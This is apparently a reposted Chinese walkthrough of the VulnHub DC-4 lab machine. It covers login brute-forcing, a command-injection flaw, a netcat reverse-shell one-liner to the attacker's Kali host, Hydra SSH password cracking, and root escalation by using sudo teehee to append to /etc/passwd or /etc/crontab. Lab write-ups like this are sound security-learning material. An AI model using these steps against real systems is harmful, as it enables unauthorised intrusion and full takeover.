VulnHub——DC-4
阿新 • • 發佈:2020-08-25
測試環境
DC-4:192.168.5.153
Kali:192.168.5.128
資訊收集
主機發現
埠服務掃描
web指紋識別
網站目錄掃描
GetShell
暴力破解
瀏覽web頁面,是一處登陸點,提示只能使用管理員使用者登入
抓個包,暴力破解密碼,使用者名稱:admin,密碼:happy
命令執行漏洞
登陸進來之後點選command
發現是一處命令執行頁面
抓個包,測試發現存在任意命令執行漏洞
反彈shell
執行反彈shell命令,成功拿到webshell
nc -e /bin/sh 192.168.5.128 4444
提權
hydra暴破ssh
檢視passwd檔案,發現有三個使用者
在jim使用者目錄下,發現了密碼備份
使用python開啟web服務,下載到kali上面
九頭蛇暴力破解SSH,使用者名稱:jim,密碼:jibril04
SSH登入到jim使用者
在/var/mail目錄下發現了charles使用者留的一封信,裡面包含了密碼
再次使用SSH切換到charles使用者
teehee提權
sudo -l 發現能夠以root身份去執行teehee命令
這裡主要是用到teehee命令的-a選項,可以往檔案中寫入內容,不覆蓋內容。
方式一,寫入passwd檔案
既然以root身份執行命令,可以向passwd檔案中追加使用者,使其擁有root許可權
方式二,寫入定時指令碼
也可以在/etc/crontab下寫入定時計劃,一分鐘後執行/bin/sh提升到root許可權
總結
1、命令執行漏洞
2、teehee命令寫入檔案提權